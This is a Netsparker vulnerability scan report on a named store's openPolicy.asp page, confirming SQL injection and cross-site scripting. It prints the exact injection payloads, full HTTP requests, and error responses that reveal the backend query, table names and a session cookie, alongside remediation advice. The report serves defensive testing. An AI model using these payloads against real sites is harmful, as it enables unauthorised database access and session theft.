SQL Injection, CWE-79, CAPEC-86, CWE-89, CAPEC-66, Javascript Injection, manheimconsultingstore.com, 01192012



Netsparker - Scan Report Summary
TARGET URL
https://www.manheimconsultingstore.com/script...
SCAN DATE
1/19/2012 7:51:28 AM
REPORT DATE
1/19/2012 8:01:17 AM
SCAN DURATION
00:00:56

Total Requests

663

Average Speed

11.76 req/sec.
9
identified
6
confirmed
2
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
22 %
IMPORTANT
22 %
MEDIUM
11 %
LOW
22 %
INFORMATION
22 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/scripts/openPolicy.asp policy GET Boolean Based SQL Injection Yes
policy GET [Probable] SQL Injection No
policy GET Cross-site Scripting Yes
Cookie Not Marked As Secure Yes
Weak Ciphers Detected Yes
Cookie Not Marked As HttpOnly Yes
policy GET Database Error Message No
IIS Version Disclosure No
Microsoft Access Identified Yes
Boolean Based SQL Injection

Boolean Based SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /scripts/openPolicy.asp

/scripts/openPolicy.asp CONFIRMED

https://www.manheimconsultingstore.com/scripts/openPolicy.asp?policy=-1+OR+17-7%3d10

Parameters

Parameter Type Value
policy GET -1 OR 17-7=10

Request

GET /scripts/openPolicy.asp?policy=-1+OR+17-7%3d10 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.manheimconsultingstore.com
Cookie: ASPSESSIONIDCAQATRSQ=EKKEKOHDIKCHAAFAHJEBEJBN
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:51:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 2377
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Manheim Consulting&nbsp;Returns Policy</title>
<link rel="stylesheet" type="text/css" href="../UserMods/_INCstyles_.css" media="all" >
</head>
<body>
<div align="left"><b>Return Policy</b><br><br>

Our products carry a money-back guarantee. If the quality or content is unsatisfactory, the shipped item should be returned to us within 30 days in new condition. For electronic downloads, you must relinquish all rights to view and print the product as well as destroy any and all electronic copies of the product.
<br><br>
<b>Return Instructions:</b>
<br>
1) Send the item in its original packaging and pack in a way to prevent damage during shipping.<br>
2) Include a detailed note stating the reason for return, your name, address, phone number, and email address. <br>
3) Send the package to the following address:<br>
<br>
Manheim Consulting<br>
6205 Peachtree Dunwoody Road<br>
Atlanta, GA 30328
<br><br>
4) If the item has been downloaded electronically, you must confirm via email that you:<br>
a) Relinquish all rights to view and print the product<br>
b) Destroy any and all electronic copies of the product<br><br>

We will issue a full refund when the product has been received or when written confirmation of Return Instructions #4 has been completed. We are not responsible for items lost during shipping and cannot process your return until the item is received at our office.<br><br>

<b>Damaged or Defective Items:</b><br>
Please follow the return instructions. A refund check will be issued in the amount you paid to return the product to us and a replacement will be sent. <br><br>

<b>Electronic Download Return Policy:</b><br>
If, during download, the transmission is interrupted in any way, you can login with your Manheim Consulting username and password to begin the downloading process again. If you are unable to complete the transmission for any reason, you may request a credit for your electronically product by following the return instructions.<br><br>

<b>Exchanges:</b><br>
If you have made the purchase with Manheim Consulting, we offer exchanges of equal or lesser value on our products.
</div>

<br>
<br>
<br>
<p class="CPcloseWindow" align="center" >
<center><a href="javascript:void(0);" onclick="self.close();">Close Window</a></center>
</p>

</body>
</html>
[Probable] SQL Injection

[Probable] SQL Injection

1 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /scripts/openPolicy.asp

/scripts/openPolicy.asp

https://www.manheimconsultingstore.com/scripts/openPolicy.asp?policy=convert(int,(CHAR(95)%2BCHAR(33..

Parameters

Parameter Type Value
policy GET convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

Request

GET /scripts/openPolicy.asp?policy=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.manheimconsultingstore.com
Cookie: ASPSESSIONIDCAQATRSQ=EKKEKOHDIKCHAAFAHJEBEJBN
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:50:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 796
Content-Type: text/html
Cache-control: private



<HTML>
<HEAD></HEAD>
<BODY>
<P align=center>
<br><br><br>
<font face="verdana,arial" size="2" color=red>
<b>System Error</b>
</font><br><br>
<table border="1" bgcolor="#EEEEEE" cellpadding="15" width="50%"><tr><td align=left>
<font face="verdana,arial" size="2">
<b>Module :</b> scripts/_INCappDBConn_.asp : openRSexecute(mySQL)<br><br><b>Number :</b> -2147217900<br><br><b>Page :</b> /scripts/openPolicy.asp<br><br><b>Desc :</b> Undefined function 'convert' in expression.<br><br><b>SQL :</b> SELECT PolicyId, PolicyTitle, PolicyDescription FROM Policies Where PolicyId = convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)));
</font>
</td></tr></table>
</P>
</BODY>
</HTML>
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /scripts/openPolicy.asp

/scripts/openPolicy.asp CONFIRMED

https://www.manheimconsultingstore.com/scripts/openPolicy.asp?policy='%22--%3E%3C/style%3E%3C/script..

Parameters

Parameter Type Value
policy GET '"--></style></script><script>alert(0x000017)</script>

Request

GET /scripts/openPolicy.asp?policy='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000017)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.manheimconsultingstore.com
Cookie: ASPSESSIONIDCAQATRSQ=EKKEKOHDIKCHAAFAHJEBEJBN
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 816
Content-Type: text/html
Cache-control: private



<HTML>
<HEAD></HEAD>
<BODY>
<P align=center>
<br><br><br>
<font face="verdana,arial" size="2" color=red>
<b>System Error</b>
</font><br><br>
<table border="1" bgcolor="#EEEEEE" cellpadding="15" width="50%"><tr><td align=left>
<font face="verdana,arial" size="2">
<b>Module :</b> scripts/_INCappDBConn_.asp : openRSexecute(mySQL)<br><br><b>Number :</b> -2147217900<br><br><b>Page :</b> /scripts/openPolicy.asp<br><br><b>Desc :</b> Syntax error (missing operator) in query expression 'PolicyId = '' ></style></script><script>netsparker(0x000017)</script>'.<br><br><b>SQL :</b> SELECT PolicyId, PolicyTitle, PolicyDescription FROM Policies Where PolicyId = '' ></style></script><script>netsparker(0x000017)</script>;
</font>
</td></tr></table>
</P>
</BODY>
</HTML>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /scripts/openPolicy.asp

/scripts/openPolicy.asp CONFIRMED

https://www.manheimconsultingstore.com/scripts/openPolicy.asp?policy=2d90ca%3Cscript%3Ealert%28docum..

Identified Cookie

ASPSESSIONIDCAQATRSQ

Request

GET /scripts/openPolicy.asp?policy=2d90ca%3Cscript%3Ealert%28document.location%29%3C/script%3Ec2b61f82062 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.manheimconsultingstore.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:50:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 816
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAQATRSQ=EKKEKOHDIKCHAAFAHJEBEJBN; path=/
Cache-control: private



<HTML>
<HEAD></HEAD>
<BODY>
<P align=center>
<br><br><br>
<font face="verdana,arial" size="2" color=red>
<b>System Error</b>
</font><br><br>
<table border="1" bgcolor="#EEEEEE" cellpadding="15" width="50%"><tr><td align=left>
<font face="verdana,arial" size="2">
<b>Module :</b> scripts/_INCappDBConn_.asp : openRSexecute(mySQL)<br><br><b>Number :</b> -2147217900<br><br><b>Page :</b> /scripts/openPolicy.asp<br><br><b>Desc :</b> Syntax error (missing operator) in query expression 'PolicyId = 2d90ca<script>alert(document.location)</script>c2b61f82062'.<br><br><b>SQL :</b> SELECT PolicyId, PolicyTitle, PolicyDescription FROM Policies Where PolicyId = 2d90ca<script>alert(document.location)</script>c2b61f82062;
</font>
</td></tr></table>
</P>
</BODY>
</HTML>
Weak Ciphers Detected

Weak Ciphers Detected

1 TOTAL
MEDIUM
CONFIRMED
1
Netsparker detected your web server is configured to allow using weak ciphers during secure communication (SSL).

You should allow only strong ciphers on your web server to protect your secure communication with your visitors.

Impact

Attackers can mount brute-force attacks to decrypt your secure communication between your server and the visitors.

Remedy

Configure your webserver to disallow using weak ciphers.

For Apache, you should modify the SSLCipherSuite directive in the httpd.conf.

	SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!EXP:RC4+RSA:+HIGH:+MEDIUM

For Microsoft IIS, you should make some changes to the system registry.

  • Click Start, click Run, type regedt32 or type regedit, and then click OK.
  • In Registry Editor, locate the following registry key : HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders
  • Set "Enabled" DWORD to "0x0" for the following registry keys:
    SCHANNEL\Ciphers\DES 56/56
    SCHANNEL\Ciphers\RC4 64/128
    SCHANNEL\Ciphers\RC4 40/128
    SCHANNEL\Ciphers\RC2 56/128
    SCHANNEL\Ciphers\RC2 40/128
    SCHANNEL\Ciphers\NULL
    SCHANNEL\Hashes\MD5
    

External References

Classification

PCI v1.2-6.5.9 PCI v2.0-6.5.4 WASC-04
- /scripts/openPolicy.asp

/scripts/openPolicy.asp CONFIRMED

https://www.manheimconsultingstore.com/scripts/openPolicy.asp?policy=2d90ca%3Cscript%3Ealert%28docum..

List of Supported Weak Ciphers

  • TLS_RSA_WITH_DES_CBC_SHA
  • TLS_RSA_EXPORT1024_WITH_RC4_56_MD5
  • TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
  • TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
  • TLS_RSA_RC4_40_MD5
  • TLS_RSA_DES_40_SHA
  • TLS_RSA_RC2_40_MD5
  • TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
  • TLS_DHE_RSA_WITH_DES_CBC_SHA

Request

GET /scripts/openPolicy.asp?policy=2d90ca%3Cscript%3Ealert%28document.location%29%3C/script%3Ec2b61f82062 HTTP/1.0
Accept: */*
Host: www.manheimconsultingstore.com

Response

[NETSPARKER] SSL Connection[NETSPARKER] SSL Connection
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /scripts/openPolicy.asp

/scripts/openPolicy.asp CONFIRMED

https://www.manheimconsultingstore.com/scripts/openPolicy.asp?policy=2d90ca%3Cscript%3Ealert%28docum..

Identified Cookie

ASPSESSIONIDCAQATRSQ

Request

GET /scripts/openPolicy.asp?policy=2d90ca%3Cscript%3Ealert%28document.location%29%3C/script%3Ec2b61f82062 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.manheimconsultingstore.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:50:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 816
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAQATRSQ=EKKEKOHDIKCHAAFAHJEBEJBN; path=/
Cache-control: private



<HTML>
<HEAD></HEAD>
<BODY>
<P align=center>
<br><br><br>
<font face="verdana,arial" size="2" color=red>
<b>System Error</b>
</font><br><br>
<table border="1" bgcolor="#EEEEEE" cellpadding="15" width="50%"><tr><td align=left>
<font face="verdana,arial" size="2">
<b>Module :</b> scripts/_INCappDBConn_.asp : openRSexecute(mySQL)<br><br><b>Number :</b> -2147217900<br><br><b>Page :</b> /scripts/openPolicy.asp<br><br><b>Desc :</b> Syntax error (missing operator) in query expression 'PolicyId = 2d90ca<script>alert(document.location)</script>c2b61f82062'.<br><br><b>SQL :</b> SELECT PolicyId, PolicyTitle, PolicyDescription FROM Policies Where PolicyId = 2d90ca<script>alert(document.location)</script>c2b61f82062;
</font>
</td></tr></table>
</P>
</BODY>
</HTML>
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

Classification

OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 CWE-200 CAPEC-118 WASC-13
- /scripts/openPolicy.asp

/scripts/openPolicy.asp

https://www.manheimconsultingstore.com/scripts/openPolicy.asp?policy=convert(int,(CHAR(95)%2BCHAR(33..

Parameters

Parameter Type Value
policy GET convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

Request

GET /scripts/openPolicy.asp?policy=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.manheimconsultingstore.com
Cookie: ASPSESSIONIDCAQATRSQ=EKKEKOHDIKCHAAFAHJEBEJBN
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:50:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 796
Content-Type: text/html
Cache-control: private



<HTML>
<HEAD></HEAD>
<BODY>
<P align=center>
<br><br><br>
<font face="verdana,arial" size="2" color=red>
<b>System Error</b>
</font><br><br>
<table border="1" bgcolor="#EEEEEE" cellpadding="15" width="50%"><tr><td align=left>
<font face="verdana,arial" size="2">
<b>Module :</b> scripts/_INCappDBConn_.asp : openRSexecute(mySQL)<br><br><b>Number :</b> -2147217900<br><br><b>Page :</b> /scripts/openPolicy.asp<br><br><b>Desc :</b> Undefined function 'convert' in expression.<br><br><b>SQL :</b> SELECT PolicyId, PolicyTitle, PolicyDescription FROM Policies Where PolicyId = convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)));
</font>
</td></tr></table>
</P>
</BODY>
</HTML>
IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /scripts/openPolicy.asp

/scripts/openPolicy.asp

https://www.manheimconsultingstore.com/scripts/openPolicy.asp?policy=2d90ca%3Cscript%3Ealert%28docum..

Extracted Version

Microsoft-IIS/6.0

Request

GET /scripts/openPolicy.asp?policy=2d90ca%3Cscript%3Ealert%28document.location%29%3C/script%3Ec2b61f82062 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.manheimconsultingstore.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:50:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 816
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAQATRSQ=EKKEKOHDIKCHAAFAHJEBEJBN; path=/
Cache-control: private



<HTML>
<HEAD></HEAD>
<BODY>
<P align=center>
<br><br><br>
<font face="verdana,arial" size="2" color=red>
<b>System Error</b>
</font><br><br>
<table border="1" bgcolor="#EEEEEE" cellpadding="15" width="50%"><tr><td align=left>
<font face="verdana,arial" size="2">
<b>Module :</b> scripts/_INCappDBConn_.asp : openRSexecute(mySQL)<br><br><b>Number :</b> -2147217900<br><br><b>Page :</b> /scripts/openPolicy.asp<br><br><b>Desc :</b> Syntax error (missing operator) in query expression 'PolicyId = 2d90ca<script>alert(document.location)</script>c2b61f82062'.<br><br><b>SQL :</b> SELECT PolicyId, PolicyTitle, PolicyDescription FROM Policies Where PolicyId = 2d90ca<script>alert(document.location)</script>c2b61f82062;
</font>
</td></tr></table>
</P>
</BODY>
</HTML>
Microsoft Access Identified

Microsoft Access Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using Microsoft Access as its backend database. This issue is reported for information purposes only.

Impact

This issue is reported as additional information only. There is no direct impact arising from this issue.
- /scripts/openPolicy.asp

/scripts/openPolicy.asp CONFIRMED

https://www.manheimconsultingstore.com/scripts/openPolicy.asp?policy=-1%20OR%201=1%20AND%20ASC(MID((..

Request

GET /scripts/openPolicy.asp?policy=-1%20OR%201=1%20AND%20ASC(MID((CHR(78)%26CHR(69)%26CHR(84)%26CHR(83)%26CHR(80)%26CHR(65)%26CHR(82)%26CHR(75)%26CHR(69)%26CHR(82)),5,1))=88%00 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.manheimconsultingstore.com
Cookie: ASPSESSIONIDCAQATRSQ=EKKEKOHDIKCHAAFAHJEBEJBN
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 13:51:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Cache-control: private